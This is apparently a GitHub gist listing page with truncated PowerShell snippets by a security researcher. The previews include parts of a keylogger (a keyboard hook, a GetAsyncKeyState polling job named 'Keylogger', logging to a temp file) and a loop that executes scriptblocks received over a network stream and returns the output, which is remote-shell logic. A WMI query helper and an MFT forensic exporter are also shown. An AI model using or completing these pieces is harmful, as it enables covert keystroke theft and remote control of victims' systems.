Jesse secabstraction
secabstraction
/ KeyLoggerRunspace.ps1
Last active
January 19, 2016 17:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-Keystrokes { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0)] | |
| [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})] | |
| [String]$LogPath = "$($env:TEMP)\key.log", | |
| [Parameter(Position = 1)] | |
| [Double]$Timeout, |
secabstraction
/ ScriptblockCallback.ps1
Last active
January 19, 2016 17:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Define callback | |
| $CallbackScript = { | |
| Param ( | |
| [Int32]$Code, | |
| [IntPtr]$wParam, | |
| [IntPtr]$lParam | |
| ) | |
| $MsgType = $wParam.ToInt32() |
secabstraction
/ HookMessageLoop.ps1
Last active
January 19, 2016 16:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Set WM_KEYBOARD_LL hook | |
| $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0) | |
| $Stopwatch = [Diagnostics.Stopwatch]::StartNew() | |
| # Message loop | |
| while ($true) { | |
| if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break } | |
| $PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0) | |
| Start-Sleep -Milliseconds 10 |
secabstraction
/ InitializationRoutine.ps1
Last active
January 19, 2016 16:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Initilizer = { | |
| function KeyLog { | |
| # Win32 Imports | |
| Start-Sleep -Milliseconds $PollingInterval | |
| # Excessive GetAsyncKeyState loop to check for pressed keys | |
| } | |
| } | |
| Start-Job -InitializationScript $Initilizer -ScriptBlock {for (;;) {Keylog}} -Name Keylogger | Out-Null |
secabstraction
/ ThrottledLoop.ps1
Last active
January 15, 2016 16:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while ($true) { Start-Sleep -Milliseconds 10 ; continue } | |
| # This minute pause is imperceptible to a user, but drops the CPU to 0% |
secabstraction
/ RunawayLoop.ps1
Last active
January 14, 2016 19:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while ($true) { continue } | |
| # With nothing to do this quickly eats 100% CPU |
secabstraction
/ StdOutProblem.ps1
Created
January 14, 2016 19:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Setup_CMD | |
| { | |
| param($FuncSetupVars) | |
| if($global:Verbose){$Verbose = $True} | |
| $FuncVars = @{} | |
| $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo | |
| $ProcessStartInfo.FileName = $FuncSetupVars[0] | |
| $ProcessStartInfo.UseShellExecute = $False | |
| $ProcessStartInfo.RedirectStandardInput = $True | |
| $ProcessStartInfo.RedirectStandardOutput = $True |
secabstraction
/ StdOutRemedy.ps1
Last active
January 14, 2016 19:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| try { $ScriptBlock = [ScriptBlock]::Create($EncodingType.GetString($ReceivedBytes)) } | |
| catch { break } # network stream closed | |
| $Global:Error.Clear() | |
| $BytesToSend += $EncodingType.GetBytes(($ScriptBlock.Invoke() | Out-String)) | |
| foreach ($Err in $Global:Error) { $BytesToSend += $EncodingType.GetBytes($Err.Exception.Message) } | |
| $BytesToSend += $EncodingType.GetBytes(("`nPS $((Get-Location).Path)> ")) |
secabstraction
/ Invoke-WmiRunspaceQuery.ps1
Last active
September 28, 2015 12:37
Runspace jobbing of Get-WmiObject
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WmiRunspaceQuery { | |
| <# | |
| .SYNOPSIS | |
| Creates a multi-threaded effect by using runspaces to speed up WMI queries to multiple hosts. | |
| Version: 0.1 | |
| Author : Jesse Davis (@secabstraction) | |
| License: BSD 3-Clause | |
| .PARAMETER ComputerName |
secabstraction
/ Export-MFT.ps1
Last active
April 30, 2025 02:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Export-MFT { | |
| <# | |
| .SYNOPSIS | |
| Extracts master file table from volume. | |
| Version: 0.1 | |
| Author : Jesse Davis (@secabstraction) | |
| License: BSD 3-Clause | |
| .DESCRIPTION |